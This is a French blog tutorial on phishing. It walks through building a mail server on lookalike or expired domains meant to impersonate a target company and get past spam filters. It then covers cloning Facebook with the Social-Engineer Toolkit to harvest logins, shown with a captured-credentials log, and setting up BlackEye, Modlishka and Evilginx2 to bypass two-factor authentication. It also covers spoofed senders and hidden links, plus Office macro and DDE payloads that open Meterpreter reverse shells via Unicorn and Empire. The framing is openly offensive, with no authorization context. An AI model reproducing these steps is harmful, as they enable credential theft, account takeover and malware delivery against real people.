SOCIAL ENGINEERING

I) Phishing par mail

  1. Utilisation VPS (digitalocean)

Suivez ce tuto qui explique tout en détail.

  1. Création Serveur SMTP 
    1. Postfix  (https://github.com/n0pe-sled/Postfix-Server-Setup)

II) Configuration d’un serveur mail avec postfix

Une adresse mail, c’est un peu comme une adresse postale. Elle se divise en 2 parties :

  • un domaine : wanadoo.fr
  • un utilisateur : kevin

Dans mon exemple, lorsque l’on écrit à Kevin via l’adresse kevin@wanadoo.fr, cela signifie que l’on écrit à l’utilisateur kevin du domaine wanadoo.fr.

Plus précisément, le mail arrive sur la machine sur laquelle se trouve le serveur mail de wanadoo.fr, pour être ensuite remis dans la boîte mail de l’utilisateur kevin.

Prérequis

Pour avoir son serveur mail, il faut donc :

  • un nom de domaine

Je conseil ovh, 1&1ionos, ou encore godaddy

Astuce :  Prenez un nom de domaine qui se rapproche du site que vous voulez copier ou de l’entreprise que vous voulez phisher.

III) Configurer le serveur DNS

Cette partie se révèle souvent être une prise de tête pour les apprentis auto-hébergés.

On doit spécifier dans le serveur DNS sur quelle IP on peut joindre le serveur mail.

La plupart des registrars (les marchands de noms de domaine) fournissent une interface simplifiée pour le serveur DNS.

Un exemple de configuration pour un domaine acheté chez Gandi.net

Le champ A

Il faut tout d’abord configurer le champ A qui fait le lien entre nom de domaine et l’adresse IP du serveur :

@       IN A   12.34.56.78 

smtp    IN A   12.34.56.78

@ : signifie que monDomaine.com est lié à l’IP 12.34.56.78

smtp : signifie que le sous-domaine smtp.monDomaine.com est lui aussi lié à l’IP 12.34.56.78

Vous pouvez indiquer des adresses IP différentes si vous possédez plusieurs serveurs et plusieurs IP.

Le champ MX

Une fois que le champ A est complété, il faut pour définir le serveur mail s’occuper du champ MX (Mail eXchange).

Nous allons convenir que le serveur mail correspond au serveur smtp.monDomaine.com. Son adresse IP ayant déjà été définie par le champ A, le champ MX s’écrit sous cette forme :

monDomaine.com.    IN MX 10 smtp

Ce qui signifie que smtp du champ A sera le serveur MX de monDomaine.com.

Vous suivez toujours ??

Lorsque vous enverrez des mails sur le domaine monDomaine.com, ils seront automatiquement acheminés vers le serveur smtp.monDomaine.com.

Important :

  • Un champ MX se définit toujours sur un champ A, pas sur un CNAME (non abordé ici)
  • Ne pas oublier le point après monDomaine.com.
Un exemple de configuration de DNS chez gandi.net
Gandi.jpeg

Ce qui donne en mode « expert » :

smtp 300 IN A 41.188.26.122 

@ 28800 IN MX 10 smtp 

www 10800 IN A 41.188.26.122

Vérifications

Avant même d’installer et configurer son serveur, il faut faire quelques vérifications (après avoir installé bind9-host).

$ host -t MX monDomaine.com

Cette commande doit retourner une ligne de ce genre :

monDomaine.com mail is handled by 10 smtp.monDomaine.com

Bien sûr, smtp.monDomaine.com doit être associé à votre IP fixe :

$ ping smtp.monDomaine.com
PING smtp.monDomaine.com (12.34.56.78) 56(84) bytes of data.

Si ces 2 vérifications ne fonctionnent pas, ce n’est pas la peine d’aller plus loin, votre serveur DNS est mal configuré.

IV) Ouverture des ports

Si votre serveur se trouve derrière une *box, il ne pourra pas communiquer avec le monde extérieur. Il nous faut ouvrir des ports.

Votre *box possède une IP fixe publique, c’est l’IP que vous avez normalement renseignée dans votre serveur DNS.

Derrière votre *box, il y a votre serveur mail qui lui possède également une adresse IP, privée. Les adresses privées sont en général 192.168.0.xxx ou 192.168.1.xxx.

Admettons que votre serveur ait comme IP 192.168.0.25 dans votre réseau privé. Il faut alors que votre *box redirige toutes les requêtes mail vers l’IP privée 192.168.0.25.

Les ports à ouvrir sont :

  • 25 : pour que le serveur réceptionne les mails
  • 110 : pour relever ses mails via POP
  • 143 : pour relever ses mails via IMAP

Tous ces ports sont à ouvrir en TCP.

Freebox : http://www.dslvalley.com/dossiers/freebox/freebox-nat.php

NeufBox : http://www.dslvalley.com/dossiers/9box4/neufbox-nat-emule.php (fin de page)

LiveBox : http://www.dslvalley.com/dossiers/orange/livebox-emule.php (fin de page)

Astuce :  Si vous avez bien suivis le tutoriel, vous utilisez sans doute DigitalOcean et un droplet. Alors vous vous posez la question : comment ouvrir mes ports avec une instance en ligne?!?

Pas de panique, il suffit d’utiliser la commande ufw.

  • ufw enable
  • ufw status
  • ufw allow <port>

V) Installation de postfix

Votre DNS est correctement configuré ? Les ports sont ouverts ? Bien. Vous avez fait le plus dur.

Vérifiez le nom de votre machine :

$ hostname

Cette commande doit vous retourner smtp.monDomaine.com. Si ce n’est pas le cas, éditez le fichier /etc/hosts et vérifiez que vous avez une ligne comme suit :

$ 127.0.0.1 smtp.monDomaine.com smtp

Sauvegardez le fichier avec CTR+X, puis dans votre terminal entrez

$ hostname smtp.monDomaine.com

Normalement, le hostname est maintenant OK.

Il est important que le hostname de votre machine soit le même que celui retourné par la commande 

$ host -t MX monDomaine.com, sinon Postfix posera des problèmes.
Installons postfix :
$ sudo apt aptitude
$ aptitude install postfix

Choisissez la configuration Internet Site. Indiquez ensuite le nom de votre machine : smtp.monDomaine.com (correspond au hostname)

Au cas où vous voudriez recommencer :

$ dpkg-reconfigure postfix

VI) Configuration

Le fichier de configuration de postfix est /etc/postfix/main.cf. Il est par défaut très bien sécurisé.

Nous allons dans un premier temps y ajouter cette ligne :

$ home_mailbox = Maildir/

Cette ligne dit à postfix que les mails des utilisateurs doivent aller dans un répertoire nommé Maildir.

Commentez (ajoutez un #) la ligne où se trouve mailbox_command pour que procmail ne soit pas utilisé (en tout cas pas pour le moment):

$ mailbox_command = procmail -a "$EXTENSION"

Pour que la modification soit prise en compte, redémarrez postfix :

$ /etc/init.d/postfix restart

VII) Création d’un nouveau mail

Bien. Vous avez votre domaine, votre serveur mail tourne. Créer une adresse mail est très simple. Il suffit d’ajouter un utilisateur !!

Vous voulez créer une adresse kevin@monDomaine.com ? Ajoutez l’utilisateur kevin sur votre machine :

$ adduser kevin

Répondez aux questions, choisissez un mot de passe à kevin et c’est tout.

Tester l’adresse en local

Nous allons envoyer un mail à Kevin, vérifions que le paquet mailx est installé :

$ aptitude install mailx

On envoie le mail :

$ echo "Le contenu du mail" | mail -s "ceci est le sujet" kevin@monDomaine.com

Le mail sera automatiquement déposé dans le répertoire Maildir situé dans le home de kevin. S’il n’existe pas, le répertoire Maildir sera automatiquement créé.

$ ls /home/kevin

N’hésitez pas à consulter les logs pour voir tout ce qui se passe sur votre serveur mail :

$ cat /var/log/mail.log
Kevin veut lire ses mails !!

Envoyer des mails, c’est bien mais pouvoir les lire, c’est mieux !! Pour que Kevin puisse lire ses mails dans un client comme Mozilla Thunderbird, c’est tout simple :

Kevin veut réceptionner ces mails via IMAP :

$ aptitude install dovecot-imapd

Il préfère POP3 ? Pas de problèmes :

$ aptitude install dovecot-pop3d

C’est tout, vous pouvez maintenant utiliser votre client mail favori pour réceptionner vos mails.

Serveur : smtp.monDomaine.com

Login : kevin

Password : le password défini lors de la création de l’utilisateur kevin

Kevin veut envoyer des mails !!

Kevin est content, il peut lire ses mails. Seulement, il aimerait répondre à ses amis mais il ne peut pas.

VIII) Utiliser le SMTP de son FAI

Postfix possède son propre service SMTP, mais ce dernier sera généralement bloqué. Pour limiter les envois de SPAMS, les FAI bloquent généralement l’envoi de mails.

Pour que votre serveur mail puisse envoyer des mails, il faut lui dire d’utiliser le SMTP de votre FAI. C’est le paramètre relayhost du fichier de configuration /etc/postfix/main.cf qu’il faut modifier :

relayhost = smtp.votreFAI.com

Principaux SMTP français :

Orange : smtp.orange.fr

Free : smtp.free.fr

Neuf : smtp.neuf.fr

IX) Utiliser le SMTP de Postfix

Cependant, certains FAI (comme Free) permettent de lever ce blocage via une option dans leur panel de gestion.

Dans ce cas, plus besoin du relayhost. Vos mails ne passeront plus par votre FAI, c’est VOTRE serveur qui enverra directement les mails.

Le problème est que les mails que vous enverrez vers les boîtes Yahoo seront classées en tant que SPAM. AOL ne voudra pas de vos mails (ce sera explicitement marqué dans les logs). Quant à Hotmail, les logs vous diront que les mails ont bien été reçus, mais vos correspondants ne les recevront jamais. Gmail ne pose quant à lui aucun souci.

Vous voulez utiliser le plus possible votre propre SMTP mais vous voulez quand même pouvoir envoyer des mails vers vos potes restés chez Hotmail ?

Créez un fichier /etc/postfix/transport avec ce contenu :

hotmail.fr    smtp:smtp.free.fr

hotmail.com   smtp:smtp.free.fr

yahoo.fr      smtp:smtp.free.fr

yahoo.com     smtp:smtp.free.fr

Ce fichier dit à postfix que pour les domaines hotmail.fr, hotmail.com, yahoo, etc., il utilisera le SMTP de free. Pour tous les autres domaine, il utilisera le smtp local. A vous d’adapter ce fichier en fonction des domaines qui ne veulent pas de vous.

Bien sûr, si vous n’êtes pas abonné Free, vous ne pourrez pas utiliser le SMTP de Free.

Pour que Postfix prenne en compte ce fichier, exécutez cette commande :

$ postmap /etc/postfix/transport

Puis relancez Postfix :

$ /etc/init.d/postfix restart

A chaque fois que vous modifierez /etc/postfix/transport, n’oubliez pas d’exécuter la commande précédente (postmap).

X) Chiffrement STARTTLS

Nous pouvons rajouter le support de STARTTLS, ce qui permet à un moment donné de chiffrer la connexion avec Postfix. L’avantage est que l’on peut alors chiffrer l’authentification SASL pour que le mot de passe n’apparaisse pas en clair. On peut aussi chiffrer le contenu des messages, mais pour cela il est plus intéressant de s’orienter vers GPG ou S/MIME, afin de s’assurer que le message reste chiffré d’un bout à l’autre entre l’expéditeur et le destinataire.

Pour pouvoir utiliser STARTTLS, il nous faut un certificat SSL

Installez Let’s Encrypt

  • sudo add-apt-repository ppa:certbot/certbot
  • sudo apt-get update
  • sudo apt-get install python-certbot-apache

Générez le certificat SSL

  • sudo certbot --apache -d example.com

Vérifier le renouvellement

  • sudo certbot renew --dry-run

Une fois le certificat obtenu, il suffit de rajouter dans main.cf :

smtpd_tls_cert_file = /chemin/vers/certificat

smtpd_tls_key_file = /chemin/vers/clef

smtpd_use_tls = yes

Docs Additionnelles :

docker run -t -i kalilinux/kali-linux-docker /bin/bash

XI) Monter une infrastructure de phishing (automatisation de la création de cette structure ici)

  1. Acheter un nom de domaine

expireddomains.net est un moteur de recherche pour les domaines récemment expirés ou abandonnés. Il fournit la recherche et le filtrage avancé, tels que l’âge d’expiration, le nombre de backlinks, le nombre de snapshots Archive.org, le score de SimilarWeb. En utilisant le site, nous pouvons enregistrer des domaines pré-utilisés, qui ressemblent à notre cible, ressemblent à notre imitation, ou sont simplement susceptibles de se fondre dans le réseau de notre cible.

https://www.expireddomains.net/

Lorsque vous choisissez un domaine pour C2 ou l’exfiltration de données, pensez à choisir un domaine classé dans les catégories Finance ou Santé. Beaucoup d’entreprises n’utiliseront pas SSL à moyen terme sur ces catégories en raison de la possibilité de problèmes juridiques ou de sensibilité des données. Il est également important de vous assurer que le domaine que vous avez choisi n’est pas associé à des programmes malveillants ou à des campagnes de phishing précédentes.

L’outil CatMyFish automatise les recherches et la vérification des catégories Web avec expireddomains.net et BlueCoat. Il peut être modifié pour appliquer plus de filtres aux recherches ou même effectuer une surveillance à long terme des actifs que vous enregistrez.

Un autre outil, DomainHunter renvoie la catégorisation BlueCoat/WebPulse, IBM X-Force, et Cisco Talos, l’âge du domaine, les autres TLD disponibles, les liens Archive.org et un rapport HTML. De plus, il effectue des vérifications pour une utilisation dans des campagnes connues de malware et de phishing en utilisant Malwaredomains.com et MXToolBox. Cet outil inclut également la prise en charge de l’OCR pour contourner les captchas BlueCoat/WebPulse. Jetez un coup d’œil à l’article du blogue sur la version initiale de l’outil pour plus de détails.

Un autre outil, AIRMASTER utilise expireddomains.net et Bluecoat pour trouver des domaines catégorisés. Cet outil utilise l’OCR pour contourner le captcha BlueCoat, augmentant ainsi la vitesse de recherche.

Enfin, assurez-vous que vos paramètres DNS ont été correctement configuré.

Vérificateur de propagation DNS

XII) Web Phishing

Les mots  » facile  » et  » phishing  » ne semblent jamais vraiment aller ensemble. La mise en place d’une infrastructure de phishing peut s’avérer très pénible. Le tutoriel suivant vous fournira les connaissances et les outils nécessaires pour configurer rapidement un serveur de phishing qui passe « la plupart » des filtres anti-spam à ce jour et vous fournira une interface RoundCube. Il existe évidemment d’autres méthodes.

Une fois que vous avez un domaine , vous devrez créer quelques enregistrements « A » pour votre domaine tel qu’illustré.

Configuration DNS

Il faut ensuite éditer vos hosts avec les commandes suivantes :

nano /etc/hosts >>>

127.0.0.1 nomdedomaine.com

127.0.0.1 mail.nomdedomaine.com mailhostname

mail.nomdedomaine.com

Maintenant, vous allez installer le front-end. Commencez par télécharger la dernière version « BETA » d’iRedMail sur votre serveur de phishing. La manière la plus simple est de cliquer avec le bouton droit de la souris sur le bouton de téléchargement, copier l’adresse du lien, utiliser wget pour le télécharger directement sur votre serveur. Ensuite, décompressez-le 

  • "tar -xvf iRedMail-0.9.8-beta2.tar.bz2". 

Naviguez dans le dossier décompressé et rendez le script iRedMail.sh exécutable 

  • chmod +x iRedMail.sh). 

Exécutez le script en tant que root, et redémarrer le serveur pour finir l’installation.

ATTENTION : A partir de ce moment vous allez avoir un problème. En effet Apache et nginx écoute sur le même port 80. Cela m’as pris pas mal d’heure avant de comprendre d’où venait l’erreur et comment la fixer. Voici le tuto à suivre avant de passer à l’étape suivante :

https://www.digitalocean.com/community/tutorials/how-to-configure-nginx-as-a-reverse-proxy-for-apache

Redémarrer les deux services et connectez vous à l’interface mail, puis à iRedadmin et roundcube. Si tout s’affiche correctement c’est parfait.

Vous voudrez vous assurer d’avoir tous les enregistrements DNS corrects reliés à votre serveur de messagerie. Voici comment les mettres en place : 

Configurer les enregistrements DNS pour votre serveur iRedMail (A, PTR, MX, SPF, DKIM, DMARC) :

  • Comment configurer un enregistrement A

Nom : Ce sera l’hôte de votre domaine qui est en fait un ordinateur dans votre domaine. Votre nom de domaine est automatiquement ajouté à votre nom. 

Remarque : Si vous laissez le champ nom vide, il sera par défaut l’enregistrement pour votre domaine de base mydomain.com. L’enregistrement de votre domaine de base s’appelle l’enregistrement racine ou apex.

Exemple d’enregistrement A :

NAME TTL TYPE DATA

http://www.mydomain.com   1800 A 192.168.1.2

mail.mydomain.com.  1800 A 192.168.1.2

Le résultat final de ce record est que http://www.mydomain.com pointe vers <IpPublic>, et mail.mydomain.com pointe vers <IpPublic>

  • Comment configurer l’enregistrement MX

Si votre FAI ou agent d’enregistrement de noms de domaine fournit le service DNS, vous pouvez lui demander d’en créer un pour vous. Si vous gérez vos propres serveurs DNS, vous devez créer vous-même les enregistrements MX dans votre zone DNS.

Exemple d’enregistrement MX :

Name Priority TTL Domain

mydomain.com.   10 mx mail.mydomain.com

Le résultat final de cet enregistrement vont faire que les emails envoyés à [user]@mydomain.com seront envoyés au serveur mail.mydomain.com.

  • Comment configurer l’enregistrement SPF

Un nouveau type d’enregistrement SPF a récemment été ajouté au protocole DNS pour le supporter (RFC4408).

Cependant, tous les serveurs DNS et de messagerie ne supportent pas encore ce nouveau type d’enregistrement, de sorte que SPF peut également être configuré en DNS en utilisant le type d’enregistrement TXT.

Exemple :

SPF se réfèrent directement à l’adresse IP. Cela signifie que les courriels envoyés à partir d’une adresse IP spécifiée sont autorisés par l’organisation expéditrice.

mydomain.com.   3600 IN TXT « v=spf1 ip4:192.168.1.100 -all »

-all signifie que toutes les autres adresses IP sont prohibées.

  • Comment configurer l’enregistrement DKIM

Commande d’exécution dans le terminal pour afficher vos touches DKIM :

$ amavisd-new showkeys

dkim._domainkey.mydomain.com.   3600 TXT (

  « v=DKIM1 ; p= « MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDYArsr2BKbdhv9efugByf7LhaK »   « txFUt0ec5+1dWmcDv0WH0qZLFK711sibNNN5LutvnaiuH+w3Kr8Ylbw8gq2j0UBok »   « FcMycUvOBd7nsYn/TUrOua3Nns+qKSJBy88IWSh2zHaGbjRYujyWSTjlPELJ0H+5 » « EV711qseo/omquskkwIDAQAB »))

Remarque : Sur certaines distributions Linux/BSD, vous devriez utiliser la commande amavisd-new au lieu de amavisd. S’il se plaint de l’absence de /etc/amavisd.conf, vous devriez indiquer à amavisd le chemin correct du fichier de configuration.

Exemple :

$ amavisd -c /etc/amavisd/amavisd/amavisd.conf showkeys

Copiez la sortie de la commande ci-dessus sur une ligne comme ci-dessous, supprimez toutes les guillemets, mais gardez tous les point virgules “;”.

Nous avons juste besoin de chaînes de caractères dans le bloc (), c’est la valeur de l’enregistrement DKIM DNS.

v=DKIM1 ; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDYArsr2BKbdhv9efugBy…..

Ajouter un enregistrement DNS de type TXT pour le nom de domaine dkim._domainkey.mydomain.com, définir la valeur de la ligne que vous avez copiée ci-dessus : v=DKIM1 ; p=……

ATTENTION : Une erreur habituelle est d’ajouter cet enregistrement DKIM au nom de domaine mydomain.com, ceci est faux. Assurez-vous d’avoir ajouté le nom de domaine dkim._domainkey.mydomain.com.

Après l’avoir ajouté dans DNS, vérifiez le avec dig ou nslookup :

  • dig -t txt txt dkim._domainkey.mydomain.com
  • nslookup -type=txt dkim._domainkey.foodmall.com

Cela devrait vous renvoyer quelque chose comme ça :

dkim._domainkey.mydomain.com. 600 IN TXT "v=DKIM1\;p=..."

Et vérifiez avec Amavisd :

$ amavisd testkeys

TESTING : dkim._domainkey.mydomain.com => pass

Si il affiche pass, ça marche niquel !

Si vous voulez re-générer la clé DKIM, ou si vous avez besoin d’en générer une pour un nouveau domaine, voici un tuto à suivre : Signer la signature DKIM sur les e-mails sortants pour le nouveau domaine de messagerie.

  • Comment configurer l’enregistrement DMARC

Pour la DMARC, vous pouvez utiliser (https://www.unlocktheinbox.com/dmarcwizard/) pour générer votre entrée dmarc. Il faut créer un record TXT.

  • Enregistrez votre domaine de messagerie dans Google Postmaster Tools

Suivez ce lien et effectuez les actions demandées dans l’ordre : https://postmaster.google.com

Tableau de bord iRedMail

Maintenant, créez un utilisateur avec qui phisher.

iRedMail Créer un utilisateur

Connectez-vous à l’interface RoundCube avec votre nouvel utilisateur et PHISHHHHHHHHHHHHEZZZZZZZZ !

Ouverture de session RoundCube

RoundCube Envoyer du courrier

Cobalt Strike est un super outil pour effectuer du SpearPhishing. Je vous laisse consulter les tutos et docs ci dessous (je ferais peut être un modules prochainement sur CobaltStrike).

Cobalt Strike Spearphishing Popup

Docs : 

Phishing Framework

Au-delà de votre propre installation de phishing ou l’utilisation de Cobalt Strike, il existe des Framework spécialement conçus pour le phishing. En voici quelques uns que vous pouvez utilisez et quelques docs dessus :

Gophish

Phishing Frenzy

The Social-Engineer Toolkit

FiercePhish 

Docs additionelle : 

  1. Phishing Téléphonique
  1. Outils de Phishing : 

SET ( Social Engineering Toolkit) :

Lors d’une attaque de ce type, on joue beaucoup sur les émotions des gens, leur capacité à être naïfs, le fait qu’ils peuvent être heureux, tristes, impatients, … Par exemple, on sait que la plupart des hommes aiment les belles femmes, dans ce cas là si ma cible est un homme, je vais essayer de lui faire faire des actions stupides en l’appâtant avec des photos de jolies filles dans un email par exemple. Bon là l’exemple est basique, mais le principe reste le même pour tout ! Proposer de l’argent, des cadeaux, enfin plein de choses pour lesquels les gens sont souvent naïfs. Et je parle en connaissance de cause. Ca m’est déjà arrivé de me faire avoir ! :p

Cloner SET

╭─root@krustyhack ~  

╰─➤ git clone https://github.com/trustedsec/social-engineer-toolkit/ set/

Préparation de l’attaque

Configuration de SET pour utiliser Apache (SET utilise Python par défaut)

gedit /etc/setoolkit/set.config :

APACHE_SERVER=ON

APACHE_DIRECTORY=/var/www/html

HARVESTER_LOG=/var/www/html

Astuce :  

  • Configurer Apache pour utiliser le protocole SSL
  • Déplacer vos images et ressources localement au lieu de les charger depuis le vrai site web
  • Vous pouvez utiliser une clé PGP pour sauvegarder les credentials obtenus. Si votre serveur est compromis les données ne pourront pas être lu par autrui.
  • On sélectionne l’option 1 (Social Engineering Attacks).
  • Puis l’option 2 (Website Attack Vectors).
  • On choisit ensuite l’attaque de type “Credential Harvester Attack Method” (numéro 3) car notre objectif est de récupérer les identifiants de nos cibles lors de leur connection à notre site cloné.
  • On choisit la fonction Site Cloner afin que SET clone le site pour nous.
  • Il faut ensuite renseigner l’ip du serveur qui va recevoir les infos du POST de notre faux formulaire. Mettez l’url de votre serveur, par exemple. Puis il faut renseigner l’url du site à cloner. Ici j’ai pris Facebook pour l’exemple.
  • Et voilà, notre site cloné est prêt. Il vous suffit de vous rendre sur l’ip que l’on a fourni précédemment et voilà le résultat.

Essayez de vous connecter via le formulaire et en même temps faites un tail -f du fichier .txt dans le répertoire /var/www/. Vous constaterez qu’une fois le bouton “Log in” cliqué, les identifiants que vous avez entrés vont s’afficher dans le fichier (ici sous l’intitulé email et pass):

╭─root@krustyhack /var/www 

╰─➤ tail -f harvester_2015-10-02\ 12\:08\:16.708617.txt

Array

(

    [lsd] =&gt; AVrM0Khj

    [display] =&gt; 

    [enable_profile_selector] =&gt; 

    [isprivate] =&gt; 

    [legacy_return] =&gt; 1

    [profile_selector_ids] =&gt; 

    [skip_api_login] =&gt; 

    [signed_next] =&gt; 

    [trynum] =&gt; 1

    [timezone] =&gt; -120

    [lgndim] =&gt; eyJ3IjoxOTIwLCJoIjoxMDgwLCJhdyI6MTkyMCwiYWgiOjEwNTQsImMiOjI0fQ==

    [lgnrnd] =&gt; 050816_HWlq

    [lgnjs] =&gt; 1443787724

    [email] =&gt; test

    [pass] =&gt; testpassword

    [persistent] =&gt; 1

    [default_persistent] =&gt; 0

    [qsstamp] =&gt; W1tbMzUsODQsODcsODgsOTgsMTAyLDExMCwxMzMsMTM0LDE3MywxOTIsMjA4LDIyMSwyNDgsMjU2LDI3MCwzMDEsMzAzLDMwNCwzNTQsMzY0LDM4Niw0MDgsNDUxLDQ1NSw0NzEsNDc1LDUwOCw1MTksNTIwLDUyNCw1NDAsNTUwLDU1Nyw1NjIsNTc0LDU4OCw1OTIsNTk5LDYxMiw2NDQsNzc3XV0sIkFabkI0Z3pZTmNOZUtrblNwcWpsLW9HTXZvU0VKZjQ2SWVJTU1oNjVnd0ZjN2VUbVNOaGp5U0VRempPU0RkVXNDRXRNZmJYV1IwUjZqU2UzRkl1MmdwRXlvUmE4RWZtSDFtN2xrY1NhaFU4VlpROUppSk5LUnJjZ2NyZzk3SlZZTGpjN0FnNWZteFdsdjUxOHByRWFXV0xVQWl4QTJOdzRWUlhGVGtNbGlfUzdOa0hMX0VwV0FOOU1Wa3JQcUxvWDZpdEJrdDlUaXNSWnVxSmVkMUJCQlJFcCJd)

BlackEye (https://github.com/thelinuxchoice/blackeye) :

  1. Installation de BlackEye 

$ cd Desktop/

$ git clone https://github.com/thelinuxchoice/blackeye.git

$ cd blackeye/

$ ls

$ chmod +x blackeye.sh

$ ./blackeye

BlackEye | The Most Complete Phishing Tool with IP Details capturing Feature
BlackEye | The Most Complete Phishing Tool with IP Details capturing Feature

Vous pouvez maintenant partager votre adresse IP locale avec la victime. Maintenant, l’étape la plus importante est de savoir comment la transmettre à la victime. 

Vous pouvez masquer l’adresse IP avec des services de raccourcissement d’URL du genre bitly et autre. De plus, vous pouvez utiliser Emkei’s Fake Mailer pour envoyer un e-mail falsifié.

BlackEye | The Most Complete Phishing Tool with IP Details capturing Feature

Remarque : L’outil ne fonctionne que sur le réseau local. AnonuD4y travaille sur la modification du script pour intégrer Ngrok avec lui afin qu’il fonctionne sur WAN mais il a quelques problèmes avec le démarrage de Ngrok. Vous pouvez consulter cette version sur Github. Aussi, vous savez peut-être pour Modlishka. Un outil qui peut contourner l’authentification à deux facteurs des sites Web, y compris les services Google. Vous n’avez pas besoin de cloner les modèles. Modlishka fonctionne comme un proxy entre vous et le serveur, ce qui signifie que le serveur fonctionne en direct. 

Modlishka (https://github.com/drk1wi/Modlishka) : ByPass 2FA

  1. Setup Modlishka 

Dernière Version disponible ici (zip) ou ici (tar).

  • $ go get -u github.com/drk1wi/Modlishka

Compiler les binaires :

$ cd $GOPATH/src/github.com/drk1wi/Modlishka/

$ make

alt text

EvilGinx2 (https://github.com/kgretzky/evilginx2) : ByPass 2FA

  1. Setup Digital Ocean :

Il suffit d’aller sur le site DigitalOcean, prendre l’abonnement à 5eur par mois puis créer votre VM.

  1. Setup EvilGinx2 (https://www.youtube.com/watch?v=SxTs9pVYBMw) : 

Installation avec RedHat:

$ go get -u github.com/golang/dep/cmd/dep

Pour installer evilginx2 :

$ sudo apt-get install git make

$ go get -u github.com/kgretzky/evilginx2

$ cd $GOPATH/src/github.com/kgretzky/evilginx2

$ make

Exécuter evilginx2 depuis un répertoire local :

$ sudo ./bin/evilginx -p ./phishlets/

Astuce :  Installez le en global pour qu’il soit accessible partout depuis votre terminal :

$ sudo make install

$ sudo evilginx

Installation depuis des package en binaire

Télécharger les derniers packages ici, Puis suivez les instructions :

$ unzip <package_name>.zip -d <package_name>

$ cd <package_name>

$ chmod 700 ./install.sh

$ sudo ./install.sh

$ sudo evilginx

Gophish (https://getgophish.com/) :

  1. Setup Gophish 

King Phisher (https://github.com/securestate/king-phisher) :

Version Python de Gophish

WifiPhisher (https://github.com/wifiphisher/wifiphisher) :

Airgeddon (https://github.com/v1s1t0r1sh3r3/airgeddon) :

Anonymemailer (http://www.anonymailer.net/)

Emkei’s Fake Mailer (http://pnusoftware.persiangig.com/Html%20&%20PHP/Email_Fake/emkei.html)

    D.Les Attaques de SE
  1. Docs Office avec Macros

Il y a plusieurs façons de créer des payloads sous formes de macros, en voici quelques unes :

Utilisation de Unicorn :

  •  ./unicorn windows/meterpreter/reverse_https <LHOSTS> <LPORT> macro
  •  msfconsole -r ./unicorn.rc #start metasploit listener

Utilisation d’Empire :

  • empire
  • usestager windows/macro #selectionne le stager Macro
  • info #liste les infos concernant le payload
  • generate

ou

  • usestager /windows/macroless_msword

Copier les Macros dans un doc

  1. Ouvrir un doc excel
  2. Allez dans l’onglet développeur
  3. Cliquez sur macro pour créer de nouveaux macros
  4. copier votre payload dedans

Utilisation de LuckyStrike :

https://github.com/curi0usJack/luckystrike

Utilisation de Vbad :

https://github.com/Pepitoh/VBad

Ouvrir Office puis cliquez sur “Autoriser l’accès au VBA”

VBad, obfusque, encrypt, rajoute de fausses clés et détruit l’encryption dès le premier résultats ainsi que détruit toute références au module pour être invisible aux yeux des développeur

  1. Docs Office Sans Macros

Utilisation de DDE (Dynamic Data Exchange)

  1. Ouvrir un document Word 
  2. Insérer une nouvelle Tab
  3. Aller dans le champs d’écriture et choisissez formule
  4. Clic droit sur “Fin de la formule non respecté” et choisir “Afficher le code au lieu de sa valeur”
  5. Changer le chemin par votre payload : DDEAUTO c:\\windows\\system32\\cùd.exe”/k powershell.exe <Votre payload EMPIRE>
  6. Autre type d’attaques sur Office
  1. Cacher ses payloads

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l’aide de votre compte WordPress.com. Déconnexion /  Changer )

Photo Google

Vous commentez à l’aide de votre compte Google. Déconnexion /  Changer )

Image Twitter

Vous commentez à l’aide de votre compte Twitter. Déconnexion /  Changer )

Photo Facebook

Vous commentez à l’aide de votre compte Facebook. Déconnexion /  Changer )

Connexion à %s